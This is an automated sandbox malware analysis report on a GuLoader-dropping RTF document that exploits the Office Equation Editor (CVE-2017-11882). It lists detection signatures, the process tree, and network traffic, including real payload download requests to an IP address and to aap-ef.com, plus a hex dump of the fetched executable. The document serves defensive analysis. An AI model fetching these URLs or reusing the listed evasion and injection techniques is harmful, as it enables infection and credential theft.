Loading ...

Play interactive tourEdit tour

Analysis Report 8825358c-c9a2-4b41-9da6-2ff1c62969d9

Overview

General Information

Sample Name:8825358c-c9a2-4b41-9da6-2ff1c62969d9 (renamed file extension from none to rtf)
Analysis ID:326325
MD5:a0d200834b8e4bce46520a97dd468053
SHA1:c6e2c6ca63e3d377b2b7347ba4e2ad071f41e162
SHA256:2d81518e22ec06dbc7091008d55481d35fe15b3ebc931ad6960759ab11e8d4c0

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Drops PE files to the user root directory
Hides threads from debuggers
Installs a global keyboard hook
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Crypto Currency Wallets
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2360 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2508 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2532 cmdline: 'C:\Users\Public\vbc.exe' MD5: 36A1FE92A6D16E8B6EF766C06B7D9300)
      • vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: 36A1FE92A6D16E8B6EF766C06B7D9300)
        • ilasm.exe (PID: 2652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe MD5: 6D15369BC06C25E50ECBF1D6A091B2F6)
        • ilasm.exe (PID: 2352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe MD5: 6D15369BC06C25E50ECBF1D6A091B2F6)
  • EQNEDT32.EXE (PID: 2836 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: vbc.exe PID: 2532JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: vbc.exe PID: 2532JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2508, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2532
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 144.168.239.55, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2508, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2508, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2508, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2532
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2508, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2532
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2508, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2532

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtfReversingLabs: Detection: 41%

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: global trafficDNS query: name: aap-ef.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.239.204.60:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 144.168.239.55:80
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 03 Dec 2020 08:53:54 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 02 Dec 2020 14:26:58 GMTETag: "e000-5b57c093254ad"Accept-Ranges: bytesContent-Length: 57344Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 a8 63 4f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 00 00 00 20 00 00 00 00 00 00 a0 11 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 09 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 10 00 00 b4 4a 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 af 00 00 28 00 00 00 00 d0 00 00 34 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 a2 00 00 00 10 00 00 00 b0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 0a 00 00 00 c0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 0c 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: unknownTCP traffic detected without corresponding DNS query: 144.168.239.55
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BAD8F7-5649-4CA3-B477-D1894D362AA0}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: aap-ef.com
      Source: vbc.exe, 00000004.00000003.2106991455.000000000084A000.00000004.00000001.sdmpString found in binary or memory: http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.2111772656.000000001ED42000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
      Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
      Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmpString found in binary or memory: https://aap-ef.com/-
      Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmpString found in binary or memory: https://aap-ef.com/W
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
      Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
      Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\Users\Public\vbc.exeWindows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe

      System Summary:

      barindex
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270456 EnumWindows,NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027633E NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002725FB NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002767DE NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276839 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276A01 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027201E NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00272242 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00271842 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027284C NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00272651 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00272A5C NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276898 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276A98 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002726E8 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002768E8 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002704F3 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002728DC NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270520 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276B2A NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00276964 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002727A4 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002769B0 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027299D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002767E4 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_004011A0
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00408A5D
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0040886E
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00408AAA
      Source: C:\Users\Public\vbc.exeCode function: String function: 00401180 appears 48 times
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@11/14@1/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$25358c-c9a2-4b41-9da6-2ff1c62969d9.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE1F5.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
